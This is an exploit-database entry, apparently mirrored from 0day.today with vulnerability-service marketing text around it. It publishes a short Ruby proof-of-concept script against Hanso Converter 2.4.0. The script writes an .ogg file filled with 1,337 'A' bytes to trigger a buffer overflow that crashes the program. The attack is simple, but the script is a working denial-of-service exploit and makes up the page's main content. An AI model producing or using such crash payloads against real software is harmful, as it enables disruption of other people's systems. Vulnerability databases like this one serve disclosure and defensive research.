Lucene search
K

Hanso Converter 2.4.0 - 'ogg' Buffer Overflow(DoS)

🗓️ 12 Nov 2013 00:00:00Reported by NecmettinType 
zdt
 zdt
🔗 0day.today👁 15 Views

Hanso Converter 2.4.0 'ogg' Buffer Overflow DoS attack using Ruby scrip

Code
#!/usr/bin/env ruby
# coding:UTF-8
# Exploit Title:Hanso Converter 2.4.0 Buffer Overflow(DoS)
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Vendor :www.hansotools.com
# Software link:http://www.hansotools.com/downloads/hanso-converter-setup.exe
# version: 2.4.0
# Tested on: windows XP sp2
 
DENEME = "A" * 1337
 
File.open('hanzo.ogg', 'w') do |bofdosya| 
bofdosya.puts (DENEME)
bofdosya.close()
end

#  0day.today [2018-02-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Nov 2013 00:00Current
7High risk
Vulners AI Score7
15